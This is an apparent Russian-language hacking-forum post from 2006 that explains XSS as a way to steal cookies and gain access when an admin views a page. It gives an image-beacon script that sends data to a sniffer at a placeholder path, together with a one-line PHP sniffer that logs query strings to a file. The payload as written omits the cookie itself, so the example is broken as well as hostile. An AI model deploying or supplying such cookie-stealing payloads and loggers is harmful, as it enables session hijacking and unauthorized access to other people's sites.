15.09.2006, 21:55
|
|
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867
Репутация:
408
|
|
XSS - Cross Site Scripting
Данная бага позволяет тебе украсть куки. Требуется чтоб админ глянул эту страничку с XSS скриптом - ты получишь куки, которые тебе обеспечат доступ. Для того чтобы получить куки тебе понадобится сниффер - скрипт который приймет сигнал от XSS скрипта и запишет куки.
XSS скрипт:
Код:
<script>img = new Image(); img.src='_PATH_';</script>
Где _PATH_ - путь к снифферу. Я лично юзаю свой сниффер. Можешь юзать например ачатовский.
Пример XSS + sniff
Код:
<script>img = new Image(); img.src='_PATH_';</script>
sniff
Код:
<? fputs(fopen("log.txt","a+"),$_SERVER['QUERY_STRING']);
?>
|
|
|